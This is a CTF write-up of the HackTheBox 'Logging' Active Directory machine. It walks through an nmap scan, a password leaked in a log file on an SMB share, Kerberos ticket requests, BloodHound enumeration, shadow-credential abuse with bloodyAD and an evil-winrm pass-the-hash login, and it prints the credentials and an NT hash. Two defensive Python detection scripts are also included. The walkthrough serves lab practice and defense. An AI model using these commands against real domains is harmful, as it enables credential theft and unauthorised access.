HackTheBox: Logging


Written by Arbaaz Jamadar
Cloud Security Engineer | OSCP | AWS Security Specialty | CySA+ | Threat Detection & Incident Response

Initial Enumeration:

Assumed breach:

wallace.everette:Welcome2026@

Port scan:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-19 02:39:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
8531/tcp  open  ssl/unknown
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.logging.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.logging.htb
| Not valid before: 2026-04-16T15:12:07
|_Not valid after:  2027-04-16T15:12:07
| tls-alpn: 
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC

SMB:

  1. The user wallace.everette has read access to 4 SMB shares.
  2. Two of the shares are interesting:
    1. Logs → contains log files
    2. WSUSTemp → suggests that Windows Server Update Services (WSUS) is running in the network


  1. The log file IdentitySync_Trace_20260219.log contains the credentials used for an LDAP bind; they were written to the log file because the bind failed (invalid credentials).


  2. The logged password follows a fairly guessable pattern, which helps us derive a candidate for the current password. Let's try Em3rg3ncyPa$$2026.


  3. The user svc_recovery is protected, so we will need a Kerberos ticket to authenticate as svc_recovery.


  4. We were able to mint a ticket using impacket's getTGT.py:

    svc_recovery:Em3rg3ncyPa$$2026
    getTGT.py 'logging.htb/svc_recovery:Em3rg3ncyPa$$2026'


  5. The ticket is valid and we are able to authenticate:


  6. We can't log onto the DC via WinRM as svc_recovery.
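The finding above (an identity-sync trace logging the bind password of a failed LDAP bind into a world-readable share) is the kind of leak a defender should catch before an attacker does. The following scanner is an added example, not from the original writeup; the log lines are constructed in the style of such a trace file, and the key names it matches are an assumption about common logger output.

```python
import re
from dataclasses import dataclass

# Constructed sample in the style of an identity-sync trace log (not the box's real file).
SAMPLE_LOG = """\
2026-02-19 03:14:05 INFO  IdentitySync: opening LDAP connection to ldap://dc01.example.local:389
2026-02-19 03:14:05 INFO  IdentitySync: bind dn=CN=svc_sync,OU=Service,DC=example,DC=local
2026-02-19 03:14:06 ERROR IdentitySync: LDAP bind failed (invalid credentials) user=svc_sync password=Sync-P4ss!2026
2026-02-19 03:14:06 INFO  IdentitySync: retry scheduled in 300s
2026-02-19 03:19:07 ERROR IdentitySync: bind failed for svc_sync, bindpw="Sync-P4ss!2026"
"""

# Key/value forms a trace logger commonly emits when it dumps a failed bind (assumed list).
SECRET_RE = re.compile(
    r"""(?P<key>\b(?:password|passwd|pwd|bindpw|bind_password|secret)\b)"""
    r"""\s*[=:]\s*["']?(?P<val>[^\s"']+)["']?""",
    re.IGNORECASE,
)


@dataclass
class Finding:
    line_no: int        # 1-based line in the log
    key: str            # which key carried the secret
    redacted_line: str  # the line with the secret replaced by ***


def redact_line(line: str) -> str:
    """Replace every credential value on a line while keeping the key so context survives."""
    return SECRET_RE.sub(lambda m: f"{m.group('key')}=***", line)


def scan_log(text: str) -> list[Finding]:
    """Return one Finding per line that carries a credential value."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        keys = [m.group("key") for m in SECRET_RE.finditer(line)]
        if keys:
            findings.append(Finding(n, keys[0], redact_line(line)))
    return findings


def redact_log(text: str) -> str:
    """Produce a copy of the log safe to leave on a shared location."""
    return "\n".join(redact_line(l) for l in text.splitlines())


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.key} leaked -> {f.redacted_line}")
```

Run it over the files in a share like Logs on a schedule; the real fix is to stop the sync job from logging bind secrets on failure, but the scan tells you how long they have been exposed.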

BloodHound:

  1. Since svc_recovery has no remote access, we need to enumerate AD relationships to check whether this user has any other privileges we can use to gain an initial foothold.

  2. Dump relations using rusthound-ce :

    rusthound-ce -d logging.htb -u 'wallace.everette' -p 'Welcome2026@' -c All

  3. The user svc_recovery has GenericWrite over msa_health$, and msa_health$ has remote access to DC01.



Initial Foothold:

  1. We can use shadow credential abuse to obtain the NT hash of msa_health$:

    bloodyAD --host DC01.logging.htb -d logging.htb -k --dc-ip 10.129.30.12 -u svc_recovery add shadowCredentials msa_health$


  2. The credentials are:

    msa_health$:603fc24ee01a9409f83c9d1d701485c5

  3. Initial foothold gained as msa_health$ via WinRM:

    evil-winrm -i logging.htb -u "msa_health$" -H '603fc24ee01a9409f83c9d1d701485c5'

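Adding a shadow credential means writing to the target's msDS-KeyCredentialLink attribute, which a domain controller records as Security event 5136 (Directory Service Changes) when that audit subcategory and a write-property SACL on the object are in place. The check below is an added example, not part of the writeup; the events are constructed and the "subject differs from target" rule is a heuristic, since the only accounts that normally write their own key credentials are the account itself (Windows Hello enrollment) or a provisioning service.

```python
from dataclasses import dataclass

# Constructed Security-log events reduced to the fields the check needs (not real data from the box).
VALUE_ADDED = "%%14674"  # OperationType code for "Value Added" in event 5136

SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "DC01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc_recovery",
     "ObjectDN": "CN=msa_health,CN=Managed Service Accounts,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc_recovery",
     "ObjectDN": "CN=msa_health,CN=Managed Service Accounts,DC=example,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
    {"EventID": 4624, "SubjectUserName": "svc_recovery"},
]


@dataclass
class Alert:
    subject: str     # account that performed the write
    target_cn: str   # CN of the object whose key credential list changed
    self_write: bool # True when an account added a key to its own object


def target_cn(object_dn: str) -> str:
    """First RDN value of a DN, e.g. 'msa_health' for 'CN=msa_health,...'."""
    first = object_dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def detect_key_credential_writes(events) -> list[Alert]:
    """Every msDS-KeyCredentialLink value added, tagged with whether the writer is the target."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        cn = target_cn(ev["ObjectDN"])
        subj = ev["SubjectUserName"]
        # Computer and MSA sAMAccountNames carry a trailing '$'; strip it before comparing to the CN.
        alerts.append(Alert(subj, cn, subj.rstrip("$").lower() == cn.lower()))
    return alerts


def high_severity(alerts: list[Alert]) -> list[Alert]:
    """Cross-account writes: one principal adding a key credential to another object."""
    return [a for a in alerts if not a.self_write]
```

Feed it the 5136 events from your SIEM; the second event above (svc_recovery writing to msa_health) is the pattern this box's foothold leaves behind.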

Lateral Movement:

  1. The user msa_health$ has a PowerShell script that checks whether the task is scheduled.


Feel free to reach out on LinkedIn or any of my socials in case you need help with the challenge. The full writeup will be released after the box is retired.